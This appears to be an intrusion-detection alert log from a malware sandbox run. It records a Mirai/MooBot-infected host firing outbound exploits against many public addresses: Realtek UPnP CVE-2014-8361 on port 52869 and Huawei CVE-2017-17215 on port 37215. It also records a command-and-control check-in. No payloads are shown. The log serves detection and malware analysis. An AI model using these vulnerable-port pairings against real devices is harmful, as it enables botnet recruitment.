                                                07/20/24-23:05:57.002874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341652869192.168.2.14186.140.123.10
                                                07/20/24-23:05:34.619289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476237215192.168.2.14197.94.74.21
                                                07/20/24-23:05:52.526129TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25660452869192.168.2.1446.75.235.28
                                                07/20/24-23:06:03.999855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614708452869192.168.2.14109.153.141.128
                                                07/20/24-23:05:38.582155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031452869192.168.2.1486.88.84.85
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453437215192.168.2.14197.0.66.168
                                                07/20/24-23:06:01.695131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613290052869192.168.2.14212.103.129.230
                                                07/20/24-23:05:45.634433TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5121852869192.168.2.14122.228.47.35
                                                07/20/24-23:05:52.554950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5560452869192.168.2.14104.253.137.229
                                                07/20/24-23:05:38.107285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614523652869192.168.2.1493.126.173.161
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444037215192.168.2.14197.20.101.132
                                                07/20/24-23:05:59.204856TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23466252869192.168.2.141.27.82.104
                                                07/20/24-23:05:59.118555TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615267252869192.168.2.14160.237.156.120
                                                07/20/24-23:05:50.531553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442437215192.168.2.14110.219.89.124
                                                07/20/24-23:05:52.716020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3399452869192.168.2.1491.53.215.210
                                                07/20/24-23:05:57.844842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601452869192.168.2.14141.227.209.24
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.14136.230.51.161
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967237215192.168.2.14157.202.74.162
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973437215192.168.2.14157.228.254.220
                                                07/20/24-23:05:35.823353TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5531252869192.168.2.1493.120.173.5
                                                07/20/24-23:05:37.593936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5520052869192.168.2.1480.164.32.127
                                                07/20/24-23:05:56.449806TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614537852869192.168.2.1436.156.255.210
                                                07/20/24-23:05:34.627062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834637215192.168.2.14197.47.165.186
                                                07/20/24-23:06:45.931745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5134652869192.168.2.1499.14.75.70
                                                07/20/24-23:06:14.472907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615082452869192.168.2.14193.57.224.82
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202437215192.168.2.14157.46.160.208
                                                07/20/24-23:05:58.662427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5336052869192.168.2.14132.216.98.22
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962237215192.168.2.14157.66.172.245
                                                07/20/24-23:05:52.728679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24068052869192.168.2.1498.121.52.186
                                                07/20/24-23:05:52.468125TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24003852869192.168.2.1489.176.48.222
                                                07/20/24-23:05:58.961618TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615799852869192.168.2.14178.131.221.8
                                                07/20/24-23:05:57.787088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4107852869192.168.2.1460.229.99.124
                                                07/20/24-23:06:02.606013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5753652869192.168.2.1480.43.192.97
                                                07/20/24-23:05:45.675032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613754052869192.168.2.14155.53.167.191
                                                07/20/24-23:05:57.133658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4428452869192.168.2.14178.83.23.44
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608437215192.168.2.14197.50.11.183
                                                07/20/24-23:05:45.424851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097437215192.168.2.1465.114.222.117
                                                07/20/24-23:05:59.445692TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912452869192.168.2.1468.182.243.39
                                                07/20/24-23:05:56.402081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.1441.62.196.63
                                                07/20/24-23:06:03.216294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23698052869192.168.2.14115.224.138.67
                                                07/20/24-23:05:50.515352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765237215192.168.2.1441.182.78.194
                                                07/20/24-23:06:02.750574TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070252869192.168.2.14148.1.223.175
                                                07/20/24-23:05:56.079797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890037215192.168.2.1441.145.23.161
                                                07/20/24-23:05:59.454602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3870452869192.168.2.14153.186.8.251
                                                07/20/24-23:05:39.685213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790037215192.168.2.1441.90.148.179
                                                07/20/24-23:06:18.369794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616013652869192.168.2.14216.158.254.36
                                                07/20/24-23:05:59.106017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615994252869192.168.2.14150.247.197.160
                                                07/20/24-23:06:02.508900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872252869192.168.2.141.179.53.254
                                                07/20/24-23:06:15.005197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614711252869192.168.2.14143.160.225.122
                                                07/20/24-23:05:36.291604TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5163652869192.168.2.14212.202.97.136
                                                07/20/24-23:05:36.574959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452037215192.168.2.14197.235.102.53
                                                07/20/24-23:06:14.916755TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615136452869192.168.2.14105.206.141.172
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.14157.25.209.247
                                                07/20/24-23:05:37.497165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4259052869192.168.2.1414.148.186.244
                                                07/20/24-23:05:39.372597TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615635252869192.168.2.14136.85.95.150
                                                07/20/24-23:05:59.221858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809852869192.168.2.14165.128.217.108
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937637215192.168.2.14116.132.59.169
                                                07/20/24-23:05:37.452253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25394452869192.168.2.14217.161.186.84
                                                07/20/24-23:06:08.328921TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25725652869192.168.2.1414.251.169.202
                                                07/20/24-23:05:57.024016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614276452869192.168.2.14109.75.221.193
                                                07/20/24-23:05:59.198584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23763052869192.168.2.14176.198.224.23
                                                07/20/24-23:05:58.706531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3629252869192.168.2.14135.37.186.112
                                                07/20/24-23:06:06.038216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615369052869192.168.2.14109.56.135.239
                                                07/20/24-23:06:56.877705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4016052869192.168.2.14192.34.4.75
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718637215192.168.2.14157.145.195.153
                                                07/20/24-23:05:58.366780TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23739852869192.168.2.14107.90.243.251
                                                07/20/24-23:05:34.648426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692637215192.168.2.14197.1.185.169
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204037215192.168.2.14157.187.107.148
                                                07/20/24-23:05:57.598746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616086852869192.168.2.14168.67.89.55
                                                07/20/24-23:06:12.549242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596252869192.168.2.1493.161.165.129
                                                07/20/24-23:06:14.487901TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615531852869192.168.2.14213.196.170.0
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070037215192.168.2.14197.186.4.250
                                                07/20/24-23:05:38.685237TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4892252869192.168.2.14144.25.238.160
                                                07/20/24-23:05:48.763322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123637215192.168.2.1441.44.52.109
                                                07/20/24-23:06:11.280683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428652869192.168.2.1432.47.76.192
                                                07/20/24-23:05:50.571555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874437215192.168.2.14197.201.144.119
                                                07/20/24-23:06:09.712957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908852869192.168.2.14142.116.55.239
                                                07/20/24-23:05:55.889998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489437215192.168.2.1441.146.180.252
                                                07/20/24-23:05:57.809290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3514852869192.168.2.14191.96.252.254
                                                07/20/24-23:05:45.439166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328637215192.168.2.14157.31.72.32
                                                07/20/24-23:05:52.504672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3301852869192.168.2.1413.143.242.72
                                                07/20/24-23:06:09.714969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5947252869192.168.2.1458.174.30.80
                                                07/20/24-23:05:48.253106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4998052869192.168.2.1446.3.114.133
                                                07/20/24-23:06:34.348451TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6041052869192.168.2.14107.203.244.180
                                                07/20/24-23:06:02.373413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5654652869192.168.2.14217.74.204.181
                                                07/20/24-23:06:12.482858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5668452869192.168.2.14149.73.181.225
                                                07/20/24-23:05:52.483885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23928052869192.168.2.14155.53.167.191
                                                07/20/24-23:06:03.131822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5562452869192.168.2.14220.74.16.80
                                                07/20/24-23:05:38.688553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3917252869192.168.2.1412.148.108.18
                                                07/20/24-23:05:47.570652TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614040652869192.168.2.1451.78.128.224
                                                07/20/24-23:05:40.471777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3851452869192.168.2.1439.47.233.5
                                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3533252869192.168.2.14189.230.165.186
                                                2024-07-20T23:05:34.676834+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840237215192.168.2.1461.98.235.91
                                                2024-07-20T23:05:36.342361+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.1441.60.177.13
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361237215192.168.2.1441.165.255.30
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5585452869192.168.2.14175.80.113.227
                                                2024-07-20T23:05:37.706701+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4275252869192.168.2.142.163.63.233
                                                2024-07-20T23:05:37.693492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389852869192.168.2.14164.159.1.86
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530037215192.168.2.14157.204.130.3
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.14197.59.198.51
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171852869192.168.2.1427.21.93.45
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4561452869192.168.2.14132.232.1.40
                                                2024-07-20T23:05:37.716310+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624852869192.168.2.14116.132.89.76
                                                2024-07-20T23:05:40.403015+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5806652869192.168.2.1473.202.31.82
                                                2024-07-20T23:05:37.833379+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4087452869192.168.2.1498.139.133.85
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791837215192.168.2.1499.80.150.223
                                                2024-07-20T23:05:36.349447+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5897437215192.168.2.14157.129.248.161
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3369452869192.168.2.1470.127.37.49
                                                2024-07-20T23:05:37.716311+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3377852869192.168.2.14118.75.62.14
                                                2024-07-20T23:05:37.797460+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5987252869192.168.2.1452.192.238.227
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944252869192.168.2.1465.119.53.40
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4869252869192.168.2.14192.216.183.201
                                                2024-07-20T23:05:36.610692+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997637215192.168.2.1412.157.227.73
                                                2024-07-20T23:05:33.866516+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596037215192.168.2.1441.133.29.67
                                                2024-07-20T23:05:36.349447+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779637215192.168.2.14157.109.103.136
                                                2024-07-20T23:05:37.823472+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3819052869192.168.2.14211.88.161.89
                                                2024-07-20T23:05:48.865590+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158837215192.168.2.14197.118.203.241
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711652869192.168.2.1427.205.21.176
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644252869192.168.2.14120.181.185.117
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5771652869192.168.2.14218.175.31.238
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5826252869192.168.2.1478.129.211.10
                                                2024-07-20T23:05:33.865110+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.14197.57.175.45
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4727652869192.168.2.14162.96.80.170
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670637215192.168.2.14157.198.129.124
                                                2024-07-20T23:05:40.483444+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5516452869192.168.2.14118.253.173.37
                                                2024-07-20T23:05:37.773805+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3514452869192.168.2.1479.15.211.18
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437837215192.168.2.14197.16.212.149
                                                2024-07-20T23:05:48.865590+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628837215192.168.2.1441.46.164.245
                                                2024-07-20T23:05:52.581631+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5266052869192.168.2.1499.53.49.224
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064437215192.168.2.14106.240.47.148
                                                2024-07-20T23:05:38.981827+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906437215192.168.2.1441.52.38.231
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5627052869192.168.2.14195.182.30.127
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3763852869192.168.2.1465.108.13.201
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467037215192.168.2.14128.4.57.232
                                                2024-07-20T23:05:33.870658+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14197.206.89.130
                                                2024-07-20T23:05:36.599872+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.14162.94.214.105
                                                2024-07-20T23:05:37.797460+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605052869192.168.2.1423.55.138.59
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594237215192.168.2.1441.141.203.96
                                                2024-07-20T23:05:37.695376+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3631252869192.168.2.14114.179.104.124
                                                2024-07-20T23:05:33.869216+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3285037215192.168.2.14157.183.228.205
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.1496.209.69.20
                                                2024-07-20T23:05:33.872000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732237215192.168.2.14176.171.193.242
                                                2024-07-20T23:05:38.983933+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4522452869192.168.2.14121.140.37.67
                                                2024-07-20T23:05:39.086384+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695437215192.168.2.1441.133.210.120
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703637215192.168.2.14157.120.132.160
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174252869192.168.2.14129.37.83.27
                                                2024-07-20T23:05:34.678246+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620837215192.168.2.14197.143.99.76
                                                2024-07-20T23:05:36.343632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684237215192.168.2.1441.96.155.17
                                                2024-07-20T23:05:37.686210+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5581252869192.168.2.1441.152.208.190
                                                2024-07-20T23:05:33.872000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147237215192.168.2.14197.237.160.210
                                                2024-07-20T23:05:37.547499+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473052869192.168.2.14210.141.252.193
                                                2024-07-20T23:05:36.566138+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887237215192.168.2.1441.87.18.27
                                                2024-07-20T23:05:33.865110+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625237215192.168.2.14120.191.233.247
                                                2024-07-20T23:05:38.956391+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810237215192.168.2.14157.55.5.162
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349837215192.168.2.1441.37.255.127
                                                2024-07-20T23:05:36.342361+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342637215192.168.2.1441.0.19.209
                                                2024-07-20T23:05:37.648285+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4199252869192.168.2.14163.170.37.61
                                                2024-07-20T23:05:38.990539+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763837215192.168.2.1441.102.68.163
                                                2024-07-20T23:05:33.839450+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092637215192.168.2.1418.5.132.170
                                                2024-07-20T23:05:36.588070+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4816052869192.168.2.1439.176.203.73
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337637215192.168.2.14197.205.1.129
                                                2024-07-20T23:05:34.669936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480037215192.168.2.14197.232.70.152
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4972052869192.168.2.14130.207.23.122
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5780052869192.168.2.14143.50.74.208
                                                2024-07-20T23:05:36.598734+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519237215192.168.2.1441.14.10.85
                                                2024-07-20T23:05:37.591367+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5530852869192.168.2.1431.182.192.107
                                                2024-07-20T23:05:37.805042+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4051452869192.168.2.14197.23.60.58
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.1441.206.29.121
                                                2024-07-20T23:05:37.773805+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5138052869192.168.2.1417.150.249.106
                                                2024-07-20T23:05:32.045227+0200TCP2030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)375502466192.168.2.1415.235.203.214
                                                2024-07-20T23:05:36.359784+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843637215192.168.2.1496.132.102.53
